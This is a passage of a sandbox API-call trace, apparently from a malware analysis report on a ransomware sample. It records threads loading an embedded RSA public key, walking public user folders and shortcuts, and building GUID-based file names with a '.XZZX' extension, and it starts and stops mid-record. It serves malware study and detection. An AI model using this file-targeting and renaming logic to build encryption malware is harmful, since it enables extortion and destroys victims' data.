cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0207.710] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\86A63E044612E15C97DB30C348EDC5A4.XZZX") returned 57 [0207.710] StrStrW (lpFirst="9665D59245322DD390020D724953121B.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 824 os_tid = 0xf7c [0207.862] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0207.862] lstrcpyW (in: lpString1=0x2daf460, lpString2="Adobe Reader X.lnk" | out: lpString1="Adobe Reader X.lnk") returned="Adobe Reader X.lnk" [0207.862] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\") returned="\\\\?\\C:\\Users\\Public\\Desktop\\" [0207.862] SetErrorMode (uMode=0x1) returned 0x1 [0207.862] lstrcpyW (in: lpString1=0x2daf860, lpString2="Adobe Reader X.lnk" | out: lpString1="Adobe Reader X.lnk") returned="Adobe Reader X.lnk" [0207.863] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xdbb4038d, Data2=0xc988, Data3=0x4664, Data4=([0]=0x8d, [1]=0x85, [2]=0xb5, [3]=0xb2, [4]=0x4a, [5]=0x52, [6]=0x2f, [7]=0x81))) returned 0x0 [0207.863] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned 46 [0207.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0207.863] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Desktop\\0E6B97E83769E920DBB4038D3A44CD68.XZZX") returned 65 [0207.863] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch="XZZX") returned 0x0 [0207.863] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk", dwFileAttributes=0x20) returned 0 [0207.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 825 os_tid = 0xf80 [0208.017] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0208.017] lstrcpyW (in: lpString1=0x2daf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0208.017] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\") returned="\\\\?\\C:\\Users\\Public\\Desktop\\" [0208.017] SetErrorMode (uMode=0x1) returned 0x1 [0208.017] lstrcpyW (in: lpString1=0x2daf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0208.017] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x96ba0067, Data2=0xff6c, Data3=0x4cf9, Data4=([0]=0xa2, [1]=0x86, [2]=0xcc, [3]=0xf9, [4]=0x5b, [5]=0x2e, [6]=0x14, [7]=0x3e))) returned 0x0 [0208.017] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini") returned 39 [0208.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0208.017] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Desktop\\DCDEC4744CCC800C96BA00674FA76454.XZZX") returned 65 [0208.017] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0208.017] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini", dwFileAttributes=0x20) returned 0 [0208.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 826 os_tid = 0xf84 [0208.177] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0208.177] lstrcpyW (in: lpString1=0x2daf460, lpString2="Google Chrome.lnk" | out: lpString1="Google Chrome.lnk") returned="Google Chrome.lnk" [0208.177] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\") returned="\\\\?\\C:\\Users\\Public\\Desktop\\" [0208.177] SetErrorMode (uMode=0x1) returned 0x1 [0208.177] lstrcpyW (in: lpString1=0x2daf860, lpString2="Google Chrome.lnk" | out: lpString1="Google Chrome.lnk") returned="Google Chrome.lnk" [0208.177] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xc24dfa7, Data2=0x9268, Data3=0x4d69, Data4=([0]=0x87, [1]=0x56, [2]=0xa8, [3]=0x71, [4]=0xd0, [5]=0x0, [6]=0x7a, [7]=0x80))) returned 0x0 [0208.177] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 45 [0208.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0208.177] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Desktop\\F68819D82C4554A80C24DFA72F2038F0.XZZX") returned 65 [0208.177] StrStrW (lpFirst="Google Chrome.lnk", lpSrch="XZZX") returned 0x0 [0208.177] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk", dwFileAttributes=0x20) returned 0 [0208.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 827 os_tid = 0xf88 [0208.329] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0208.329] lstrcpyW (in: lpString1=0x2daf460, lpString2="Mozilla Firefox.lnk" | out: lpString1="Mozilla Firefox.lnk") returned="Mozilla Firefox.lnk" [0208.329] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\") returned="\\\\?\\C:\\Users\\Public\\Desktop\\" [0208.329] SetErrorMode (uMode=0x1) returned 0x1 [0208.329] lstrcpyW (in: lpString1=0x2daf860, lpString2="Mozilla Firefox.lnk" | out: lpString1="Mozilla Firefox.lnk") returned="Mozilla Firefox.lnk" [0208.329] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xb80deb51, Data2=0x6d44, Data3=0x4e0c, Data4=([0]=0x94, [1]=0x17, [2]=0x6a, [3]=0x65, [4]=0xc3, [5]=0xe0, [6]=0x62, [7]=0xd))) returned 0x0 [0208.329] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned 47 [0208.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0208.329] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Desktop\\D0E3FE84214FD730B80DEB51242ABB78.XZZX") returned 65 [0208.329] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch="XZZX") returned 0x0 [0208.329] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk", dwFileAttributes=0x20) returned 0 [0208.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 828 os_tid = 0xf8c [0208.486] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0208.486] lstrcpyW (in: lpString1=0x2daf460, lpString2="94338BDA105A8F7E16CC5903148F73C6.XZZX" | out: lpString1="94338BDA105A8F7E16CC5903148F73C6.XZZX") returned="94338BDA105A8F7E16CC5903148F73C6.XZZX" [0208.486] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\") returned="\\\\?\\C:\\Users\\Public\\Documents\\" [0208.486] SetErrorMode (uMode=0x1) returned 0x1 [0208.486] lstrcpyW (in: lpString1=0x2daf860, lpString2="94338BDA105A8F7E16CC5903148F73C6.XZZX" | out: lpString1="94338BDA105A8F7E16CC5903148F73C6.XZZX") returned="94338BDA105A8F7E16CC5903148F73C6.XZZX" [0208.486] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x6176767f, Data2=0x5253, Data3=0x4401, Data4=([0]=0xa7, [1]=0x33, [2]=0xc1, [3]=0x8e, [4]=0xa6, [5]=0xbb, [6]=0x4e, [7]=0x88))) returned 0x0 [0208.486] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Documents\\94338BDA105A8F7E16CC5903148F73C6.XZZX") returned 67 [0208.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0208.486] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Documents\\8B5D192D15DE5E536176767F18B9429B.XZZX") returned 67 [0208.486] StrStrW (lpFirst="94338BDA105A8F7E16CC5903148F73C6.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 829 os_tid = 0xf90 [0208.647] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0208.647] lstrcpyW (in: lpString1=0x2daf460, lpString2="BC1D727A30ED2409A03B25C6350E0851.XZZX" | out: lpString1="BC1D727A30ED2409A03B25C6350E0851.XZZX") returned="BC1D727A30ED2409A03B25C6350E0851.XZZX" [0208.647] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads\\") returned="\\\\?\\C:\\Users\\Public\\Downloads\\" [0208.647] SetErrorMode (uMode=0x1) returned 0x1 [0208.647] lstrcpyW (in: lpString1=0x2daf860, lpString2="BC1D727A30ED2409A03B25C6350E0851.XZZX" | out: lpString1="BC1D727A30ED2409A03B25C6350E0851.XZZX") returned="BC1D727A30ED2409A03B25C6350E0851.XZZX" [0208.647] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x6b7c564f, Data2=0xda9, Data3=0x4e55, Data4=([0]=0x8d, [1]=0x36, [2]=0x44, [3]=0xc8, [4]=0xbe, [5]=0x6a, [6]=0x59, [7]=0x43))) returned 0x0 [0208.647] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Downloads\\BC1D727A30ED2409A03B25C6350E0851.XZZX") returned 67 [0208.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0208.647] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Downloads\\4576FD27042E071D6B7C564F0708EB65.XZZX") returned 67 [0208.647] StrStrW (lpFirst="BC1D727A30ED2409A03B25C6350E0851.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 830 os_tid = 0xf94 [0208.800] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0208.800] lstrcpyW (in: lpString1=0x2daf460, lpString2="50C930C63ECF303723410A464304147F.XZZX" | out: lpString1="50C930C63ECF303723410A464304147F.XZZX") returned="50C930C63ECF303723410A464304147F.XZZX" [0208.800] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Libraries\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\") returned="\\\\?\\C:\\Users\\Public\\Libraries\\" [0208.800] SetErrorMode (uMode=0x1) returned 0x1 [0208.800] lstrcpyW (in: lpString1=0x2daf860, lpString2="50C930C63ECF303723410A464304147F.XZZX" | out: lpString1="50C930C63ECF303723410A464304147F.XZZX") returned="50C930C63ECF303723410A464304147F.XZZX" [0208.800] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x928b5fa8, Data2=0x9966, Data3=0x489c, Data4=([0]=0x89, [1]=0x48, [2]=0x17, [3]=0xb5, [4]=0x7a, [5]=0x2c, [6]=0x30, [7]=0x66))) returned 0x0 [0208.800] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Libraries\\50C930C63ECF303723410A464304147F.XZZX") returned 67 [0208.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0208.800] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Libraries\\AFB384F02B822A28928B5FA82E5D0E70.XZZX") returned 67 [0208.800] StrStrW (lpFirst="50C930C63ECF303723410A464304147F.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 831 os_tid = 0xf98 [0208.953] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0208.953] lstrcpyW (in: lpString1=0x2daf460, lpString2="721728630B1F6BB259C033230F404FFA.XZZX" | out: lpString1="721728630B1F6BB259C033230F404FFA.XZZX") returned="721728630B1F6BB259C033230F404FFA.XZZX" [0208.953] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Libraries\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\") returned="\\\\?\\C:\\Users\\Public\\Libraries\\" [0208.953] SetErrorMode (uMode=0x1) returned 0x1 [0208.953] lstrcpyW (in: lpString1=0x2daf860, lpString2="721728630B1F6BB259C033230F404FFA.XZZX" | out: lpString1="721728630B1F6BB259C033230F404FFA.XZZX") returned="721728630B1F6BB259C033230F404FFA.XZZX" [0208.953] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x4ce6556e, Data2=0xafc, Data3=0x4ffb, Data4=([0]=0xaa, [1]=0xc6, [2]=0x6, [3]=0xc7, [4]=0x11, [5]=0x72, [6]=0xae, [7]=0xce))) returned 0x0 [0208.953] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Libraries\\721728630B1F6BB259C033230F404FFA.XZZX") returned 67 [0208.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0208.953] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Libraries\\B2126448036E89144CE6556E06496D5C.XZZX") returned 67 [0208.953] StrStrW (lpFirst="721728630B1F6BB259C033230F404FFA.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 832 os_tid = 0xf9c [0209.110] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- 